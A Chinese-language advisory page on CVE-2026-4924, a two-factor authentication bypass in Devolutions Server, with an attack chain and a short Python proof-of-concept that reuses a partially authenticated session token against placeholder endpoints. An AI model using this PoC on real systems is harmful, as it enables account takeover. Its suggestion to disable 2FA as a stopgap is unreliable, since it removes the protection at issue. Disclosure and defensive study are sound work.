CVE-2026-4924 CVSS 8.2 高危

CVE-2026-4924 Devolutions Server 2FA认证绕过漏洞

披露日期: 2026-04-01

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4924

漏洞类型

认证绕过

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Devolutions Server

漏洞概述

Devolutions Server 2026.1.11及更早版本在双因素认证（2FA）功能的实现上存在认证不当漏洞。该漏洞允许拥有有效用户凭证的远程攻击者通过复用部分认证的会话令牌，绕过多因素认证检查。攻击者无需提供第二重验证因素即可获取受害者账户的未授权访问权限，导致账户安全性完全失效。

技术细节

该漏洞源于Devolutions Server在处理会话状态时的逻辑缺陷。在标准的2FA登录流程中，系统应在用户提交第一重凭证（如密码）后创建一个临时的部分认证会话，仅在验证通过第二重因素（如OTP代码）后才将会话状态升级为完全认证。然而，受影响版本未能正确区分这两种会话状态或未严格校验会话令牌的完整性。攻击者若已获取目标的有效用户名和密码，可向服务器发起登录请求并捕获服务器返回的中间会话令牌。通过直接复用此令牌发送给受保护的端点，攻击者可以欺骗服务器认为已通过完整的身份验证流程，从而成功绕过2FA机制建立经过身份验证的会话。

攻击链分析

STEP 1

信息收集

攻击者获取目标Devolutions Server的有效用户名和密码，可能通过网络钓鱼或凭据泄露获取。

STEP 2

发起登录请求

攻击者使用获取的凭证向Devolutions Server发送登录请求。

STEP 3

获取会话令牌

服务器在验证第一重凭证后，返回一个部分认证的会话令牌（Session Token）。

STEP 4

复用令牌绕过验证

攻击者捕获该会话令牌，并直接将其用于访问受保护的API或界面，跳过2FA验证步骤。

STEP 5

获得未授权访问

服务器接受该令牌，攻击者成功以受害者身份登录系统。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Example)
target_url = "https://devolutions-server.example.com/api/login"

# Valid credentials obtained by attacker
credentials = {
    "username": "victim_user",
    "password": "user_password"
}

session = requests.Session()

# Step 1: Initiate login to get the session cookie/token
response = session.post(target_url, data=credentials)

# Check if a session cookie or token is set before 2FA completion
# Vulnerability: The server might issue a valid authenticated session cookie here
if 'session_token' in response.cookies:
    print("[+] Partially authenticated token obtained: {}".format(response.cookies['session_token']))
    
    # Step 2: Access a protected resource directly using the token
    protected_resource = "https://devolutions-server.example.com/api/dashboard"
    access_response = session.get(protected_resource)
    
    if access_response.status_code == 200:
        print("[!] Successfully bypassed 2FA and accessed protected resource.")
        print("Content:", access_response.text[:100])
    else:
        print("[-] Failed to access resource.")
else:
    print("[-] No token found.")

影响范围

Devolutions Server <= 2026.1.11

防御指南

临时缓解措施

建议立即应用官方发布的安全补丁。如果无法立即升级，应暂时禁用受影响用户的2FA功能（虽然会降低安全性但可防止特定绕过）或实施严格的网络访问控制策略，仅允许受信任的IP地址访问管理面板，直到完成修复。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4924
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4924
3 Details https://www.cvedetails.com/cve/CVE-2026-4924/
4 VulDB https://vuldb.com/cve/CVE-2026-4924
5 Link https://devolutions.net/security/advisories/DEVO-2026-0010

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表